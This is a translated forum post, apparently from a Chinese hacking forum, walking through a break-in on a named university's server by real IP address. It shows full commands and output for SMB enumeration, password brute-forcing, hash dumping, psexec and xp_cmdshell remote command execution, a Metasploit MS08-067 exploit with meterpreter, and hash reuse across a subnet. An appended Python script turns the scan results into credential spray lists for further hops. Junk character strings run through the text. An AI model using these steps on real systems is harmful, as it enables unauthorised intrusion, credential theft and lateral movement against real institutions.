中国网络渗透测试联盟

Title: Breaking into Guangxi Normal University with nmap + msf

Author: admin    Time: 2012-12-4 12:46
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
, a1 A; m3 B' ?5 Y& v5 x8 z, j* I# F" U
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb     // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
; }/ B$ a' o: a  f4 Y' l+ o- J& K
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use this script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser     // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
* n4 `( l( n" A+ B' S( W8 h8 Z, Q7 T
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

, F) b8 ^# s- Y  J9 uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
0 X9 s( [2 w* u2 q" U9 g
6 r  A2 u3 ^9 Q8 U5 Q//获取用户密码- K( m4 N% c6 M( H
+ E6 K+ J3 X* F+ l7 F
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
1 F8 g, i# O" ~7 ~2 E: ]7 b4 s$ T+ c
Nmap scan report for bogon (202.103.242.2418)$ w& h- }$ k3 Z; N
- i0 Y7 H3 t, A( ~) c  C' G8 w% ^
Host is up (0.00041s latency).+ _- `7 q& C, O6 i2 C) D

- o) s; S) ^' qNot shown: 993 closed ports' ~3 E8 c) Z! }/ |1 }* i% T/ ?: x" i& L

+ J* h0 \9 @) N/ cPORT     STATE SERVICE% c7 o. k. I9 j0 H& @' `+ M7 C

: ?9 |* F* q0 l! s135/tcp  open  msrpc; G7 j7 N+ W/ O- |8 B

3 c0 M/ B8 ~4 o$ R3 ?139/tcp  open  netbios-ssn) b5 \' ~" M9 A2 A/ e7 H7 q
3 t8 f* ?8 \0 i1 c) T5 J; n5 t8 l( O. ?6 q
445/tcp  open  microsoft-ds
: j0 R, ]: a3 v
1 Q" o. B. V" N( A) G! }1 o1025/tcp open  NFS-or-IIS) [& o" Z) V* D3 e' V9 L8 _

) {2 ^) X' ?; c' U! g! {1026/tcp open  LSA-or-nterm5 q. K* t  i8 F6 i
$ p- q' V& J, G( q# w7 k
3372/tcp open  msdtc4 O7 `5 b6 |! d7 P, ?+ }' v, ?
' H& Y; M$ M5 s  u
3389/tcp open  ms-term-serv" d+ T" b; [: Y0 T. k

/ i/ }9 e: ?2 K2 uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% }6 o# L! V" B) T# f$ |

5 D6 m; E# O# w4 @/ n3 dHost script results:
* P0 D3 ^6 R8 k' M
6 [( i+ o& L7 m8 e3 D1 b| smb-brute:
( J; B2 {& I: K8 r* F$ Q& a1 U3 A0 H" J7 I( c7 g, i5 p" _, ]
administrator:<blank> => Login was successful: ], r9 A. E- h% |

1 C3 e3 s/ Q2 D; a. e. F|_  test:123456 => Login was successful
' e# d4 O; N" D, q: ^  N+ f
' N: t, y. Y* CNmap done: 1 IP address (1 host up) scanned in 28.22 seconds7 Y& Q! F; F; t6 A
. s6 }( t# Q: ]5 ]3 F. o& X6 I
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2     // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
: G7 j( z( Q+ S3 C$ N) U: @1 L" i3 @( l
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe     // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"     // log in remotely as sa and run a command
3 c- ?" K( }. P5 X1 i  \+ p! R: x+ F5 w" Q: f0 T" L) Z) W3 B/ P
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241     // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
/ l! A" Z( ~; n! R9 ~/ L( p7 F' J: A5 l/ F
root@bt:~# msfconsole     // use msf to exploit the MS08-067 vulnerability on the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
+ A( y8 F" a; i4 }2 N
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful; a simple msf + nmap attack.
4 ?- j+ V+ K6 ^





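Added example, also not from the original post: when smb-brute and smb-check-vulns are run across a whole subnet as in the last step, each machine gets its own host block in nmap's normal output and the useful lines are easy to miss. This Python parser (written for this page, not an nmap tool) collects successful logins and VULNERABLE checks per host. The two-host output it reads is constructed in nmap's output format; 192.168.1.120 is an invented second host used only to show a negative result.

```python
"""Collect smb-brute / smb-check-vulns findings from nmap normal output
(added example, not from the original post)."""
import re

# Constructed sample in nmap's normal-output format; the second host is invented.
SAMPLE_OUTPUT = """\
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.168.1.120
Host is up (0.0010s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-brute:
|_  No accounts found
| smb-check-vulns:
|_  MS08-067: NOT VULNERABLE

Nmap done: 254 IP addresses (2 hosts up) scanned in 40.11 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?(\d+\.\d+\.\d+\.\d+)\)?$")
SCRIPT_RE = re.compile(r"^\|_? ?([\w-]+):$")
LOGIN_RE = re.compile(r"^\|_? +(\S+?):(\S*) => Login was successful$")
VULN_RE = re.compile(r"^\|_? +(MS\d{2}-\d{3}): (VULNERABLE|NOT VULNERABLE|CHECK DISABLED.*|ERROR.*)$")


def parse_host_scripts(text: str) -> dict:
    """Return {ip: {"creds": [(user, password)], "vulns": [advisory id]}}."""
    hosts, ip, script = {}, None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HOST_RE.match(line)
        if m:  # new host block: the IP is in the parentheses when a name resolves
            ip = m.group(2)
            hosts[ip] = {"creds": [], "vulns": []}
            script = None
            continue
        if ip is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:  # "| smb-brute:" style header selects which matcher applies below
            script = m.group(1)
            continue
        if script == "smb-brute":
            m = LOGIN_RE.match(line)
            if m:
                user, pw = m.group(1), m.group(2)
                hosts[ip]["creds"].append((user, "" if pw == "<blank>" else pw))
        elif script == "smb-check-vulns":
            m = VULN_RE.match(line)
            if m and m.group(2) == "VULNERABLE":
                hosts[ip]["vulns"].append(m.group(1))
    return hosts


def spray_lists(hosts: dict):
    """Unique users and passwords to reuse as userdb/passdb on the next hop."""
    users = sorted({u for h in hosts.values() for u, _ in h["creds"]})
    passwords = sorted({p for h in hosts.values() for _, p in h["creds"]})
    return users, passwords


if __name__ == "__main__":
    found = parse_host_scripts(SAMPLE_OUTPUT)
    for ip, info in found.items():
        print(ip, info)
    print("userdb:", spray_lists(found)[0], "passdb:", spray_lists(found)[1])
```

Feed the real sweep in with `nmap -oN sweep.txt ...` and `parse_host_scripts(open("sweep.txt").read())`; the blank password comes out as an empty string so it can go straight into a passdb file line.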
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2